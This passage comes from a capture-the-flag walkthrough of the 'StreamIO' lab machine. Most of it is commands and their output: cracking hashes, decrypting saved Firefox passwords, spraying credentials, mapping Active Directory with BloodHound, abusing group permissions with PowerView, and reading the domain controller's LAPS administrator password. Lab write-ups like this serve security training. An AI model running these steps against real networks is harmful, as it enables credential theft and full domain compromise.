Process the data (write to a separate file; piping tee back into the file being read would truncate it first):
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# awk -F' ' '{print $2":"$3}' creds_dbbackup.txt | tee creds_dbbackup_hashes.txt
Crack the hashes:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds_dbbackup_hashes.txt /usr/share/wordlists/rockyou.txt -m 0 --user --show
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Looking back at the earlier shell, the user nikk37 happens to have a corresponding home directory, so we try lateral movement with that user first.
Connecting with evil-winrm
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
Getting a foothold
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\nikk37\desktop> ls
Directory: C:\Users\nikk37\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/26/2024 1:49 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\desktop> cat user.txt
f45a4a88b84668351f92a3729cac0011
Post-exploitation information gathering
Obviously, after a successful lateral move the first thing to check is the current user's privileges and group membership
*Evil-WinRM* PS C:\Users\nikk37\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\nikk37\desktop> net user nikk37
User name nikk37
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:57:16 AM
Password expires Never
Password changeable 2/23/2022 1:57:16 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/22/2022 2:39:51 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Nothing particularly interesting to us
Check which programs are installed locally, to widen our attack surface:
*Evil-WinRM* PS C:\> cd 'Program Files'
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 1:35 AM Common Files
d----- 2/22/2022 2:57 AM iis express
d----- 3/28/2022 4:46 PM internet explorer
d----- 2/22/2022 2:14 AM LAPS
d----- 2/22/2022 2:52 AM Microsoft
d----- 2/22/2022 1:54 AM Microsoft SQL Server
d----- 2/22/2022 1:53 AM Microsoft Visual Studio 10.0
d----- 2/22/2022 1:53 AM Microsoft.NET
d----- 2/25/2022 11:35 PM PHP
d----- 2/22/2022 2:56 AM Reference Assemblies
d----- 2/22/2022 2:56 AM runphp
d----- 2/22/2022 1:35 AM VMware
d-r--- 3/28/2022 4:46 PM Windows Defender
d----- 3/28/2022 6:06 PM Windows Defender Advanced Threat Protection
d----- 3/28/2022 4:46 PM Windows Mail
d----- 3/28/2022 4:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 3/28/2022 4:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 9/15/2018 12:19 AM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cd ..\'Program Files (x86)'
*Evil-WinRM* PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:28 AM Common Files
d----- 2/25/2022 11:35 PM IIS
d----- 2/25/2022 11:38 PM iis express
d----- 3/28/2022 4:46 PM Internet Explorer
d----- 2/22/2022 1:54 AM Microsoft SQL Server
d----- 2/22/2022 1:53 AM Microsoft.NET
d----- 5/26/2022 4:09 PM Mozilla Firefox
d----- 5/26/2022 4:09 PM Mozilla Maintenance Service
d----- 2/25/2022 11:33 PM PHP
d----- 2/22/2022 2:56 AM Reference Assemblies
d----- 3/28/2022 4:46 PM Windows Defender
d----- 3/28/2022 4:46 PM Windows Mail
d----- 3/28/2022 4:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 3/28/2022 4:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM WindowsPowerShell
Among these, LAPS and Mozilla Firefox are the most interesting, because credentials may leak from them too.
Trying to obtain leaked credentials from firefox and recover them
Search:
From the official firefox documentation we also learned which files store the passwords:
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> cd 5rwivk2l.default
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> ls
Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2022 2:40 AM 47 times.json
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> cd ..\br53rxeg.default-release
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls
Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:40 AM bookmarkbackups
d----- 2/22/2022 2:40 AM browser-extension-data
d----- 2/22/2022 2:41 AM crashes
d----- 2/22/2022 2:42 AM datareporting
d----- 2/22/2022 2:40 AM minidumps
d----- 2/22/2022 2:42 AM saved-telemetry-pings
d----- 2/22/2022 2:40 AM security_state
d----- 2/22/2022 2:42 AM sessionstore-backups
d----- 2/22/2022 2:40 AM storage
-a---- 2/22/2022 2:40 AM 24 addons.json
-a---- 2/22/2022 2:42 AM 5189 addonStartup.json.lz4
-a---- 2/22/2022 2:42 AM 310 AlternateServices.txt
-a---- 2/22/2022 2:41 AM 229376 cert9.db
-a---- 2/22/2022 2:40 AM 208 compatibility.ini
-a---- 2/22/2022 2:40 AM 939 containers.json
-a---- 2/22/2022 2:40 AM 229376 content-prefs.sqlite
-a---- 2/22/2022 2:40 AM 98304 cookies.sqlite
-a---- 2/22/2022 2:40 AM 1081 extension-preferences.json
-a---- 2/22/2022 2:40 AM 43726 extensions.json
-a---- 2/22/2022 2:42 AM 5242880 favicons.sqlite
-a---- 2/22/2022 2:41 AM 262144 formhistory.sqlite
-a---- 2/22/2022 2:40 AM 778 handlers.json
-a---- 2/22/2022 2:40 AM 294912 key4.db
-a---- 2/22/2022 2:41 AM 1593 logins-backup.json
-a---- 2/22/2022 2:41 AM 2081 logins.json
-a---- 2/22/2022 2:42 AM 0 parent.lock
-a---- 2/22/2022 2:42 AM 98304 permissions.sqlite
-a---- 2/22/2022 2:40 AM 506 pkcs11.txt
-a---- 2/22/2022 2:42 AM 5242880 places.sqlite
-a---- 2/22/2022 2:42 AM 8040 prefs.js
-a---- 2/22/2022 2:42 AM 180 search.json.mozlz4
-a---- 2/22/2022 2:42 AM 288 sessionCheckpoints.json
-a---- 2/22/2022 2:42 AM 1853 sessionstore.jsonlz4
-a---- 2/22/2022 2:40 AM 18 shield-preference-experiments.json
-a---- 2/22/2022 2:42 AM 611 SiteSecurityServiceState.txt
-a---- 2/22/2022 2:42 AM 4096 storage.sqlite
-a---- 2/22/2022 2:40 AM 50 times.json
-a---- 2/22/2022 2:40 AM 98304 webappsstore.sqlite
-a---- 2/22/2022 2:42 AM 141 xulstore.json
We did find these two files, but when we view their contents part of it is garbled and the passwords shown are in encrypted form. We can then look for a tool dedicated to recovering firefox passwords:
After a rough read of the recovery principle and how such tools work, we found a tool that does not need the NSS library and runs with python alone:
https://github.com/lclevy/firepwd
First transfer the key files to kali:
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db to key4.db
Info: Download successful!
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json to logins.json
Info: Download successful!
Just in case, also download the nss library from the firefox root directory:
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\'Program Files (x86)'\'Mozilla Firefox'
*Evil-WinRM* PS C:\Program Files (x86)\Mozilla Firefox> download nss3.dll
Info: Downloading C:\Program Files (x86)\Mozilla Firefox\nss3.dll to nss3.dll
Info: Download successful!
Start the recovery attempt:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# git clone https://github.com/lclevy/firepwd.git
。。。
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# chmod +x firepwd.py
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# ./firepwd.py
./firepwd.py: 行 17:
decode Firefox passwords (https://github.com/lclevy/firepwd)
lclevy@free.fr
28 Aug 2013: initial version, Oct 2016: support for logins.json, Feb 2018: support for key4.db,
Apr2020: support for NSS 3.49 / Firefox 75.0 : https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6
for educational purpose only, not production level
integrated into https://github.com/AlessandroZ/LaZagne
tested with python 3.7.3, PyCryptodome 3.9.0 and pyasn 0.4.8
key3.db is read directly, the 3rd party bsddb python module is NOT needed
NSS library is NOT needed
profile directory under Win10 is C:\\Users\\[user]\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[profile_name]
: 没有那个文件或目录
./firepwd.py: 行 19: from: 未找到命令
./firepwd.py: 行 20: import: 未找到命令
./firepwd.py: 行 21: from: 未找到命令
./firepwd.py: 行 22: import: 未找到命令
./firepwd.py: 行 23: from: 未找到命令
./firepwd.py: 行 25: from: 未找到命令
./firepwd.py: 行 26: from: 未找到命令
./firepwd.py: 行 27: import: 未找到命令
./firepwd.py: 行 28: from: 未找到命令
./firepwd.py: 行 29: from: 未找到命令
./firepwd.py: 行 30: from: 未找到命令
./firepwd.py: 行 31: from: 未找到命令
./firepwd.py: 行 32: import: 未找到命令
./firepwd.py: 行 33: from: 未找到命令
./firepwd.py: 行 35: 未预期的记号 "(" 附近有语法错误
./firepwd.py: 行 35: `def getShortLE(d, a):'
# The errors indicate that the two key credential files must first be placed in this directory
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# cd ..
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# mkdir firefox_creds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cp key4.db logins.json ./firefox_creds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
Traceback (most recent call last):
File "/home/cvestone/Desktop/htb/StreamIO/./firepwd/firepwd.py", line 28, in <module>
from Crypto.Cipher import DES3, AES
ModuleNotFoundError: No module named 'Crypto'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# pip3 install pycryptodome
。。。
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
# Some credentials have been recovered
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds | tee firefox_cracked
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2":"$4}' | tee firefox_crackedcreds
admin:JDg0dd1s@d0p3cr3@t0r
nikk37:n1kk1sd0p3t00:)
yoshihide:paddpadd@12
JDgodd:password@12
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2}' | tee firefox_crackeduser
admin
nikk37
yoshihide
JDgodd
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $4}' | tee firefox_crackedpwd
JDg0dd1s@d0p3cr3@t0r
n1kk1sd0p3t00:)
paddpadd@12
password@12
Trying the SMB shares again
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB streamio.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB streamio.htb 445 DC [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB streamio.htb 445 DC [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE
SMB streamio.htb 445 DC [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec winrm streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB streamio.htb 5985 NONE [*] None (name:streamio.htb) (domain:None)
HTTP streamio.htb 5985 NONE [*] http://streamio.htb:5985/wsman
WINRM streamio.htb 5985 NONE [-] None\admin:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\admin:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\admin:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\admin:password@12
WINRM streamio.htb 5985 NONE [-] None\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\nikk37:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\nikk37:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\nikk37:password@12
WINRM streamio.htb 5985 NONE [-] None\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\yoshihide:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\yoshihide:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\yoshihide:password@12
WINRM streamio.htb 5985 NONE [-] None\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM streamio.htb 5985 NONE [-] None\JDgodd:n1kk1sd0p3t00:)
WINRM streamio.htb 5985 NONE [-] None\JDgodd:paddpadd@12
WINRM streamio.htb 5985 NONE [-] None\JDgodd:password@12
Only one credential turns out to work; try accessing smb:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H streamio.htb -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.225.102:445 Name: streamio.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
No access, but this is a valid credential, so save it for now
At this point the next step is privilege escalation, and since we are in a domain environment we follow the domain-penetration approach
Domain penetration
When arriving in an unfamiliar domain, the most efficient approach is to collect information about the target domain with bloodhound, then analyse the relationships among all domain members and groups in Active Directory, as well as potential attack paths
Collecting domain information with bloodhound to analyse attack paths
Before using the bloodhound collector bloodhound-python we need a user with fairly high privileges. We have two usable user credentials but cannot tell which has more privileges; what is certain is that JDgodd is the more active user, so try that one first
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# bloodhound-python -c ALL -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb -ns 10.129.206.188 --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20240227142202_bloodhound.zip
Import the collection results into bloodhound; before that, be sure to initialise the neo4j database first:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# neo4j restart
。。。
After opening the bloodhound main interface, import the .zip file, then search for the assets already compromised and mark them as owned; in that user node's analysis, click directly to find the shortest path:
Then set the target DC as the ending node:
You can click help on a method in the path to see specific exploitation guidance:
The relationship between bloodhound and manual collection when analysing domain attack paths
bloodhound is actually not mysterious; it is essentially an integration of the manual commands we use to collect information in a domain, for example:
*Evil-WinRM* PS C:\Users\nikk37\Documents> net user JDgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:56:42 AM
Password expires Never
Password changeable 2/23/2022 1:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2022 10:17:08 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37\Documents> dsget user "CN=jdgodd,CN=users,DC=streamio,DC=htb" -memberof -expand
"CN=Domain Users,CN=Users,DC=streamIO,DC=htb"
"CN=Users,CN=Builtin,DC=streamIO,DC=htb"
*Evil-WinRM* PS C:\Users\nikk37\Documents> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
# For example, we are interested in the group 'CORE STAFF' and want to know more details about it, so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adgroup "core staff"
DistinguishedName : CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb
GroupCategory : Security
GroupScope : Global
Name : CORE STAFF
ObjectClass : group
ObjectGUID : 113400d4-c787-4e58-91ad-92779b38ecc5
SamAccountName : CORE STAFF
SID : S-1-5-21-1470860369-1569627196-4264678630-1108
# If we want to know its ACL:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access
。。。
ActiveDirectoryRights : WriteOwner
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : streamIO\JDgodd
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
。。。
# We notice this permission, which interests us; it relates to JDgodd, and this is the path bloodhound shows us.
# However, the result list is very long and it is sometimes not easy to locate the key information. We can filter by the users we have obtained to see what permissions that user holds in this group's ACL, so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> (get-acl "AD:CN=CORE STAFF,CN=Users,DC=streamio,DC=htb").access | where-object { $_.IdentityReference -like "*jdgodd*"}
ActiveDirectoryRights : WriteOwner
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : streamIO\JDgodd
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
# Besides the ACL, we also need to know what permissions a group has on computers in the domain; but before that, we need to know how many computers are active in the domain, so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adcomputer -filter *
DistinguishedName : CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
DNSHostName : DC.streamIO.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : 8c0f9a80-aaab-4a78-9e0d-7a4158d8b9ee
SamAccountName : DC$
SID : S-1-5-21-1470860369-1569627196-4264678630-1000
UserPrincipalName :
# Then we need to traverse all OUs of the DC, inspect their ACLs one by one and correlate them with the core staff group, so:
*Evil-WinRM* PS C:\Users\nikk37\Documents> get-adorganizationalunit -filter * | %{ (get-acl "Ad:$($_.distinguishedname)").access } | where-object { $_.identityreference -like "*core*"}
ActiveDirectoryRights : ReadProperty, ExtendedRight
InheritanceType : Descendents
ObjectType : a156e052-fb12-45bc-9a00-056271040d9f
InheritedObjectType : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : streamIO\CORE STAFF
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
ActiveDirectoryRights : ReadProperty
InheritanceType : Descendents
ObjectType : a0ffa854-9b42-45fa-bd07-4e1a651f2610
InheritedObjectType : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : streamIO\CORE STAFF
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
# The above shows that the core staff group can read some properties of the target DC, and we certainly hope it can read the administrator password. Looking back,
# we found LAPS when we looked at the installed software, so if we can read LAPS this constitutes a complete escalation path, which is exactly what the bloodhound analysis graph shows.
So, to summarise this privilege-escalation path: add the user JDgodd to the core staff group, then read LAPS as a member of that group
Privilege escalation
Adding a user to a group with the powerview tool
Adding a user to a group requires a third-party tool, such as powerview. Address:
https://github.com/cvestone/PowerSploit/blob/master/Recon/PowerView.ps1
Download or copy the script locally, then upload it to the target machine via evil-winrm:
*Evil-WinRM* PS C:\programdata> upload /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1
Info: Uploading /home/cvestone/Desktop/htb/StreamIO/PowerView.ps1 to C:\programdata\PowerView.ps1
Progress: 55% : |▓▓▓▓▒░░░░░|
Data: 4190544 bytes of 4190544 bytes copied
Info: Upload successful!
# Then load the script into memory
*Evil-WinRM* PS C:\Users\nikk37\Documents> . .\powerview.ps1
# Then start adding the user to the group
*Evil-WinRM* PS C:\Users\nikk37\Documents> $pass =convertto-securestring 'JDg0dd1s@d0p3cr3@t0r' -AsplainText -force
*Evil-WinRM* PS C:\programdata> $cred =new-object system.management.automation.pscredential('streamio.htb\jdgodd',$pass)
*Evil-WinRM* PS C:\programdata> add-domainobjectacl -Credential $cred -Targetidentity "Core Staff" -principalIdentity "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> add-domaingroupmember -credential $cred -identity "Core Staff" -members "streamio\jdgodd"
*Evil-WinRM* PS C:\programdata> net user jdgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 1:56:42 AM
Password expires Never
Password changeable 2/23/2022 1:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/29/2024 3:13:43 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *CORE STAFF
The command completed successfully.
# We made it! Now jdgodd is in the "CORE STAFF" group.
Reading LAPS to obtain the domain administrator credential
Then we can try reading LAPS:
*Evil-WinRM* PS C:\programdata> get-adcomputer dc -properties * -credential $cred
。。。
*Evil-WinRM* PS C:\programdata> get-adcomputer -filter * -properties ms-Mcs-AdmPwd -credential $cred
。。。
If this method does not return it, there are other ways:
# First way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ldapsearch -H ldap://10.129.170.48 -b "dc=streamio,dc=htb" -x -D jdgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCs-admpwd=*)" ms-mcs-admpwd
# extended LDIF
#
# LDAPv3
# base <dc=streamio,dc=htb> with scope subtree
# filter: (ms-MCs-admpwd=*)
# requesting: ms-mcs-admpwd
#
# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: 7hcr@&{jI91l7M
# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb
# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb
# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3
# Second way:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds
